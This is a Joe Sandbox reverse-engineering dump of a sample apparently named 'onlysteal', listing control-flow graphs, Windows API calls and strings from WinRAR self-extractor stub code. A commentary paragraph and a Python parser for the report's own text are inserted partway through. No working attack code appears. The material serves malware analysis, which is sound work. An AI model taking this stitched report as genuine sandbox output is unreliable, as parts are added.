                                      • Opcode Fuzzy Hash: d2c5051d15e25f9ebfa2011016c1d018b65c53f3d9261fb8283e22d909eb0f5f
                                      • Instruction Fuzzy Hash: CC31A275650302AFD7249F21EC8CD2BBBB9FF89750B044519F809C2260EB71DD64DEA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1025 23a69b-23a6bf call 24ec50 1028 23a6c1-23a6ce FindFirstFileW 1025->1028 1029 23a727-23a730 FindNextFileW 1025->1029 1030 23a742-23a7ff call 240602 call 23c310 call 2415da * 3 1028->1030 1031 23a6d0-23a6e2 call 23bb03 1028->1031 1029->1030 1032 23a732-23a740 GetLastError 1029->1032 1038 23a804-23a811 1030->1038 1040 23a6e4-23a6fc FindFirstFileW 1031->1040 1041 23a6fe-23a707 GetLastError 1031->1041 1033 23a719-23a722 1032->1033 1033->1038 1040->1030 1040->1041 1043 23a717 1041->1043 1044 23a709-23a70c 1041->1044 1043->1033 1044->1043 1046 23a70e-23a711 1044->1046 1046->1043 1048 23a713-23a715 1046->1048 1048->1033
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6C4
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6F2
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A6FE
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,0023A592,000000FF,?,?), ref: 0023A728
                                      • GetLastError.KERNEL32(?,?,?,?,0023A592,000000FF,?,?), ref: 0023A734
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                      • String ID:
                                      • API String ID: 42610566-0
                                      • Opcode ID: 50e2c7ed994c4878cf761aaef7a8ca4ce88677b968d39ae3633571b144ba98c7
                                      • Instruction ID: 4af2b19bb126aeb989baacd547fd953fa6b54ed71413daa039ece7235cbe7c3e
                                      • Opcode Fuzzy Hash: 50e2c7ed994c4878cf761aaef7a8ca4ce88677b968d39ae3633571b144ba98c7
                                      • Instruction Fuzzy Hash: 88415C72910515ABCB25DF64CCC8AEDF7B8BB49350F1041A6E59AE3200D7746EA5CF90
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002,00000000), ref: 00257E0F
                                      • TerminateProcess.KERNEL32(00000000,?,00257DC4,00000000,0026C300,0000000C,00257F1B,00000000,00000002,00000000), ref: 00257E16
                                      • ExitProcess.KERNEL32 ref: 00257E28
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 374054b54741b914571ae31a357478a011a6fbc0edb7c0a29785ff7125194af4
                                      • Instruction ID: 6c1e8431aa9a126b6034051a7e2269da735b0fe1d10854b1831579ccc25b843f
                                      • Opcode Fuzzy Hash: 374054b54741b914571ae31a357478a011a6fbc0edb7c0a29785ff7125194af4
                                      • Instruction Fuzzy Hash: 9AE0BF31054244ABCF15AF54ED0E9497F69EB50342B008454FD199A172CB75DE69CA94
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: bf56fd77687d75ca91f55363b2acc590950a1c5c42a21e522eafa7a3acb20a98
                                      • Instruction ID: 49feee771b4c85a698bfca77a4ea582622930e2633e35d37cda756fe1b7bcb1c
                                      • Opcode Fuzzy Hash: bf56fd77687d75ca91f55363b2acc590950a1c5c42a21e522eafa7a3acb20a98
                                      • Instruction Fuzzy Hash: 2F820BF1924346AEDF15DF64C891BFAB7B9AF05300F0841B9F8499F142DB705AA9CB60
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0024B7E5
                                        • Part of subcall function 00231316: GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                        • Part of subcall function 00231316: SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024B8D1
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B8EF
                                      • IsDialogMessageW.USER32(?,?), ref: 0024B902
                                      • TranslateMessage.USER32(?), ref: 0024B910
                                      • DispatchMessageW.USER32(?), ref: 0024B91A
                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0024B93D
                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0024B960
                                      • GetDlgItem.USER32(?,00000068), ref: 0024B983
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024B99E
                                      • SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024B9B1
                                        • Part of subcall function 0024D453: _wcschr.LIBVCRUNTIME ref: 0024D45C
                                        • Part of subcall function 0024D453: _wcslen.LIBCMT ref: 0024D47D
                                      • SetFocus.USER32(00000000), ref: 0024B9B8
                                      • _swprintf.LIBCMT ref: 0024BA24
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 0024D4D4: GetDlgItem.USER32(00000068,0028FCB8), ref: 0024D4E8
                                        • Part of subcall function 0024D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0024AF07,00000001,?,?,0024B7B9,0026506C,0028FCB8,0028FCB8,00001000,00000000,00000000), ref: 0024D510
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0024D51B
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002635F4), ref: 0024D529
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D53F
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0024D559
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D59D
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0024D5AB
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0024D5BA
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0024D5E1
                                        • Part of subcall function 0024D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002643F4), ref: 0024D5F0
                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0024BA68
                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0024BA90
                                      • GetTickCount.KERNEL32 ref: 0024BAAE
                                      • _swprintf.LIBCMT ref: 0024BAC2
                                      • GetLastError.KERNEL32(?,00000011), ref: 0024BAF4
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0024BB43
                                      • _swprintf.LIBCMT ref: 0024BB7C
                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0024BBD0
                                      • GetCommandLineW.KERNEL32 ref: 0024BBEA
                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0024BC47
                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0024BC6F
                                      • Sleep.KERNEL32(00000064), ref: 0024BCB9
                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0024BCE2
                                      • CloseHandle.KERNEL32(00000000), ref: 0024BCEB
                                      • _swprintf.LIBCMT ref: 0024BD1E
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024BD7D
                                      • SetDlgItemTextW.USER32(?,00000065,002635F4), ref: 0024BD94
                                      • GetDlgItem.USER32(?,00000065), ref: 0024BD9D
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0024BDAC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0024BDBB
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024BE68
                                      • _wcslen.LIBCMT ref: 0024BEBE
                                      • _swprintf.LIBCMT ref: 0024BEE8
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0024BF32
                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0024BF4C
                                      • GetDlgItem.USER32(?,00000068), ref: 0024BF55
                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0024BF6B
                                      • GetDlgItem.USER32(?,00000066), ref: 0024BF85
                                      • SetWindowTextW.USER32(00000000,0027A472), ref: 0024BFA7
                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0024C007
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024C01A
                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0024C0BD
                                      • EnableWindow.USER32(00000000,00000000), ref: 0024C197
                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0024C1D9
                                        • Part of subcall function 0024C73F: __EH_prolog.LIBCMT ref: 0024C744
                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0024C1FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^$$__tmp_rar_sfx_access_check_%u$h$$winrarsfxmappingfile.tmp$Q&
                                      • API String ID: 3829768659-1052983135
                                      • Opcode ID: bdbc6622a6eb8432abaaf6790d67a33030d8f1c334b21b7f310e8d53eec464c4
                                      • Instruction ID: c8a4122b282a25abd8b476b5926cafdda4ade7dca74b74bce3c42217fc373ccb
                                      • Opcode Fuzzy Hash: bdbc6622a6eb8432abaaf6790d67a33030d8f1c334b21b7f310e8d53eec464c4
                                      • Instruction Fuzzy Hash: 2F42E871D64255BAEB26DF74AC4EFBE377CAB01700F100055F649A60E2CBB59AA4CF21

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 268 240863-240886 call 24ec50 GetModuleHandleW 271 2408e7-240b48 268->271 272 240888-24089f GetProcAddress 268->272 273 240c14-240c40 GetModuleFileNameW call 23c29a call 240602 271->273 274 240b4e-240b59 call 2575fb 271->274 275 2408a1-2408b7 272->275 276 2408b9-2408c9 GetProcAddress 272->276 291 240c42-240c4e call 23b146 273->291 274->273 286 240b5f-240b8d GetModuleFileNameW CreateFileW 274->286 275->276 279 2408e5 276->279 280 2408cb-2408e0 276->280 279->271 280->279 288 240b8f-240b9b SetFilePointer 286->288 289 240c08-240c0f CloseHandle 286->289 288->289 292 240b9d-240bb9 ReadFile 288->292 289->273 298 240c50-240c5b call 24081b 291->298 299 240c7d-240ca4 call 23c310 GetFileAttributesW 291->299 292->289 294 240bbb-240be0 292->294 296 240bfd-240c06 call 240371 294->296 296->289 304 240be2-240bfc call 24081b 296->304 298->299 309 240c5d-240c7b CompareStringW 298->309 306 240ca6-240caa 299->306 307 240cae 299->307 304->296 306->291 310 240cac 306->310 311 240cb0-240cb5 307->311 309->299 309->306 310->311 313 240cb7 311->313 314 240cec-240cee 311->314 315 240cb9-240ce0 call 23c310 GetFileAttributesW 313->315 316 240cf4-240d0b call 23c2e4 call 23b146 314->316 317 240dfb-240e05 314->317 323 240ce2-240ce6 315->323 324 240cea 315->324 327 240d73-240da6 call 234092 AllocConsole 316->327 328 240d0d-240d6e call 24081b * 2 call 23e617 call 234092 call 23e617 call 24a7e4 316->328 323->315 326 240ce8 323->326 324->314 326->314 333 240df3-240df5 ExitProcess 327->333 334 240da8-240ded GetCurrentProcessId AttachConsole call 253e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 0024087C
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0024088E
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002408BF
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00240B69
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00240B83
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00240B93
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,|<&,00000000), ref: 00240BB1
                                      • CloseHandle.KERNEL32(00000000), ref: 00240C09
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00240C1E
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<&,?,00000000,?,00000800), ref: 00240C72
                                      • GetFileAttributesW.KERNELBASE(?,?,|<&,00000800,?,00000000,?,00000800), ref: 00240C9C
                                      • GetFileAttributesW.KERNEL32(?,?,D=&,00000800), ref: 00240CD8
                                        • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                        • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      • _swprintf.LIBCMT ref: 00240D4A
                                      • _swprintf.LIBCMT ref: 00240D96
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • AllocConsole.KERNEL32 ref: 00240D9E
                                      • GetCurrentProcessId.KERNEL32 ref: 00240DA8
                                      • AttachConsole.KERNEL32(00000000), ref: 00240DAF
                                      • _wcslen.LIBCMT ref: 00240DC4
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00240DD5
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00240DDC
                                      • Sleep.KERNEL32(00002710), ref: 00240DE7
                                      • FreeConsole.KERNEL32 ref: 00240DED
                                      • ExitProcess.KERNEL32 ref: 00240DF5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                      • String ID: (=&$,<&$,@&$0?&$0A&$4B&$8>&$D=&$DXGIDebug.dll$H?&$H@&$HA&$P>&$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=&$`@&$d?&$dA&$dwmapi.dll$h=&$h>&$kernel32$uxtheme.dll$|<&$|?&$|@&$<&$>&$?&$@&$A&
                                      • API String ID: 1207345701-236927283
                                      • Opcode ID: b6c45ccc0f571fb3dec18909d66a242ebf35f6a1a5197f8cb166c245b97c8cdd
                                      • Instruction ID: c8e69fb3dc4826d4195a39102f9e1eff1e9d16217ffe4b78a3a71db78f52e07a
                                      • Opcode Fuzzy Hash: b6c45ccc0f571fb3dec18909d66a242ebf35f6a1a5197f8cb166c245b97c8cdd
                                      • Instruction Fuzzy Hash: FAD196B1428345ABD325DF50D889B9FBAE8BF85704F50491DF68997140C7B086ACCFA2
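The function summarised above (blocks 268 at 240863 through 334 at 240da8) documents the usual installer-stub defence against DLL preloading from the download folder: SetDllDirectoryW and SetDefaultDllDirectories are resolved with GetProcAddress instead of being imported (they do not exist on older Windows builds), the module path from GetModuleFileNameW is used to probe for DXGIDebug.dll, dwmapi.dll and uxtheme.dll (CompareStringW, GetFileAttributesW), a console is allocated to print "Please remove %s from %s folder. It is unsecure to run %s until it is done." and the process exits, and subcall 0024081B builds a GetSystemDirectoryW path before LoadLibraryW (Crypt32.dll appears among its arguments). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the control_flow_graph line, the "APIs" bullets and the "String ID" line exactly as they are rendered in this section (the sample inputs are copied from it), then checks that both GetFileAttributesW blocks can reach the ExitProcess block and that the search-order and DLL-name indicators are all present. The parsers follow this page's text rendering only; they are not a Joe Sandbox API.

```python
"""Parse one Joe Sandbox IDA-plugin function summary (control_flow_graph edge list,
"APIs" bullets, "String ID" line) and flag the DLL-search-order-hardening pattern in
the function at 0x240863. Added example; sample input is copied from the report above."""
import re

# Sample input: the control_flow_graph line of the function, joined from chunks.
CFG_LINE = " ".join([
    "268 240863-240886 call 24ec50 GetModuleHandleW 271 2408e7-240b48 268->271 272 240888-24089f GetProcAddress",
    "268->272 273 240c14-240c40 GetModuleFileNameW call 23c29a call 240602 271->273 274 240b4e-240b59 call 2575fb",
    "271->274 275 2408a1-2408b7 272->275 276 2408b9-2408c9 GetProcAddress 272->276 291 240c42-240c4e call 23b146",
    "273->291 274->273 286 240b5f-240b8d GetModuleFileNameW CreateFileW 274->286 275->276 279 2408e5 276->279",
    "280 2408cb-2408e0 276->280 279->271 280->279 288 240b8f-240b9b SetFilePointer 286->288 289 240c08-240c0f",
    "CloseHandle 286->289 288->289 292 240b9d-240bb9 ReadFile 288->292 289->273 298 240c50-240c5b call 24081b",
    "291->298 299 240c7d-240ca4 call 23c310 GetFileAttributesW 291->299 292->289 294 240bbb-240be0 292->294",
    "296 240bfd-240c06 call 240371 294->296 296->289 304 240be2-240bfc call 24081b 296->304 298->299",
    "309 240c5d-240c7b CompareStringW 298->309 306 240ca6-240caa 299->306 307 240cae 299->307 304->296 306->291",
    "310 240cac 306->310 311 240cb0-240cb5 307->311 309->299 309->306 310->311 313 240cb7 311->313",
    "314 240cec-240cee 311->314 315 240cb9-240ce0 call 23c310 GetFileAttributesW 313->315 316 240cf4-240d0b",
    "call 23c2e4 call 23b146 314->316 317 240dfb-240e05 314->317 323 240ce2-240ce6 315->323 324 240cea 315->324",
    "327 240d73-240da6 call 234092 AllocConsole 316->327 328 240d0d-240d6e call 24081b * 2 call 23e617 call 234092",
    "call 23e617 call 24a7e4 316->328 323->315 326 240ce8 323->326 324->314 326->314 333 240df3-240df5 ExitProcess",
    "327->333 334 240da8-240ded GetCurrentProcessId AttachConsole call 253e13 GetStdHandle WriteConsoleW Sleep",
    "FreeConsole 327->334 328->333 334->333",
])
# Sample input: five of the "APIs" bullets of the same function.
API_LINES = [
    "• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0024088E",
    "• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002408BF",
    "• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<&,?,00000000,?,00000800), ref: 00240C72",
    "  • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,"
    "Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858",
    "• AllocConsole.KERNEL32 ref: 00240D9E",
]
# Sample input: the "String ID" line ('$' separates the strings the function references).
STRING_ID_LINE = ("(=&$,<&$,@&$0?&$0A&$4B&$8>&$D=&$DXGIDebug.dll$H?&$H@&$HA&$P>&$Please remove %s from "
                  "%s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$"
                  "SetDllDirectoryW$T=&$`@&$d?&$dA&$dwmapi.dll$h=&$h>&$kernel32$uxtheme.dll$|<&$|?&$|@&$<&$>&$?&$@&$A&")

_RANGE = re.compile(r"^[0-9a-f]{4,}(?:-[0-9a-f]{4,})?$")   # block address or start-end range
_EDGE = re.compile(r"^(\d+)->(\d+)$")
_API = re.compile(r"^(?:Part of subcall function ([0-9A-F]+): )?(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$")


def parse_cfg(line):
    """Return (nodes, edges): nodes maps block id -> range, internal callees and imported APIs."""
    toks = [t for t in line.split() if t != "control_flow_graph"]
    nodes, edges, cur, i = {}, set(), None, 0
    while i < len(toks):
        t, m = toks[i], _EDGE.match(toks[i])
        if m:                                               # "a->b"
            edges.add((int(m.group(1)), int(m.group(2))))
        elif t.isdigit() and i + 1 < len(toks) and _RANGE.match(toks[i + 1]):
            cur = int(t)                                    # "<id> <start>-<end>" opens a block
            nodes[cur] = {"range": toks[i + 1], "calls": [], "apis": []}
            i += 1
        elif t == "call":                                   # "call <addr>": internal callee
            nodes[cur]["calls"].append(toks[i + 1])
            i += 1
        elif t == "*":                                      # "* N": previous callee repeated N times
            nodes[cur]["calls"] += [nodes[cur]["calls"][-1]] * (int(toks[i + 1]) - 1)
            i += 1
        else:                                               # anything else is an imported API
            nodes[cur]["apis"].append(t)
        i += 1
    return nodes, edges


def nodes_calling(nodes, api):
    return sorted(n for n, v in nodes.items() if api in v["apis"])


def reachable(edges, src):
    """Blocks reachable from src by following edges (transitive successors)."""
    seen, stack = set(), [src]
    while stack:
        n = stack.pop()
        for a, b in edges:
            if a == n and b not in seen:
                seen.add(b)
                stack.append(b)
    return seen


def parse_api(line):
    """Split an "APIs" bullet into name, module, argument list, ref address and enclosing subcall."""
    m = _API.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError("unrecognised API line: " + line)
    sub, name, module, args, ref = m.groups()
    return {"name": name, "module": module, "args": args.split(",") if args else [],
            "ref": ref, "subcall_of": sub}


def dll_search_hardening(api_records, string_ids):
    """Heuristic: search-order APIs resolved at run time, DLL names referenced as strings
    (probed beside the executable) and explicit LoadLibraryW of named DLLs."""
    resolved = {r["args"][-1] for r in api_records if r["name"] == "GetProcAddress" and r["args"]}
    search_apis = sorted(resolved & {"SetDllDirectoryW", "SetDefaultDllDirectories"})
    dll_names = sorted(s for s in string_ids if s.lower().endswith(".dll"))
    explicit = sorted(a for r in api_records if r["name"] == "LoadLibraryW"
                      for a in r["args"] if a.lower().endswith(".dll"))
    return {"search_order_apis": search_apis, "dll_names": dll_names,
            "explicit_loads": explicit, "hardened": bool(search_apis and dll_names)}


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_LINE)
    exits = nodes_calling(nodes, "ExitProcess")
    for n in nodes_calling(nodes, "GetFileAttributesW"):
        print(f"block {n} ({nodes[n]['range']}) reaches ExitProcess blocks", [e for e in exits if e in reachable(edges, n)])
    print(dll_search_hardening([parse_api(l) for l in API_LINES], STRING_ID_LINE.split("$")))
```

The same three parsers apply unchanged to the other function summaries on this page; only dll_search_hardening is specific to this function's pattern, and it is deliberately narrow so that a CRT helper that merely calls LoadLibraryExW (like the api-ms- loader further down) does not trigger it.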

                                      Control-flow Graph

                                      control_flow_graph 347 24c73f-24c757 call 24eb78 call 24ec50 352 24d40d-24d418 347->352 353 24c75d-24c787 call 24b314 347->353 353->352 356 24c78d-24c792 353->356 357 24c793-24c7a1 356->357 358 24c7a2-24c7b7 call 24af98 357->358 361 24c7b9 358->361 362 24c7bb-24c7d0 call 241fbb 361->362 365 24c7d2-24c7d6 362->365 366 24c7dd-24c7e0 362->366 365->362 367 24c7d8 365->367 368 24c7e6 366->368 369 24d3d9-24d404 call 24b314 366->369 367->369 371 24ca7c-24ca7e 368->371 372 24c7ed-24c7f0 368->372 373 24c9be-24c9c0 368->373 374 24ca5f-24ca61 368->374 369->357 380 24d40a-24d40c 369->380 371->369 377 24ca84-24ca8b 371->377 372->369 379 24c7f6-24c850 call 24a64d call 23bdf3 call 23a544 call 23a67e call 236edb 372->379 373->369 378 24c9c6-24c9d2 373->378 374->369 376 24ca67-24ca77 SetWindowTextW 374->376 376->369 377->369 381 24ca91-24caaa 377->381 382 24c9d4-24c9e5 call 257686 378->382 383 24c9e6-24c9eb 378->383 436 24c98f-24c9a4 call 23a5d1 379->436 380->352 387 24cab2-24cac0 call 253e13 381->387 388 24caac 381->388 382->383 385 24c9f5-24ca00 call 24b48e 383->385 386 24c9ed-24c9f3 383->386 391 24ca05-24ca07 385->391 386->391 387->369 404 24cac6-24cacf 387->404 388->387 398 24ca12-24ca32 call 253e13 call 253e3e 391->398 399 24ca09-24ca10 call 253e13 391->399 424 24ca34-24ca3b 398->424 425 24ca4b-24ca4d 398->425 399->398 405 24cad1-24cad5 404->405 406 24caf8-24cafb 404->406 410 24cad7-24cadf 405->410 411 24cb01-24cb04 405->411 406->411 413 24cbe0-24cbee call 240602 406->413 410->369 416 24cae5-24caf3 call 240602 410->416 418 24cb06-24cb0b 411->418 419 24cb11-24cb2c 411->419 426 24cbf0-24cc04 call 25279b 413->426 416->426 418->413 418->419 437 24cb76-24cb7d 419->437 438 24cb2e-24cb68 419->438 431 24ca42-24ca4a call 257686 424->431 432 24ca3d-24ca3f 424->432 425->369 427 24ca53-24ca5a call 253e2e 425->427 446 24cc06-24cc0a 426->446 447 24cc11-24cc62 call 240602 call 24b1be GetDlgItem SetWindowTextW SendMessageW call 253e49 426->447 427->369 
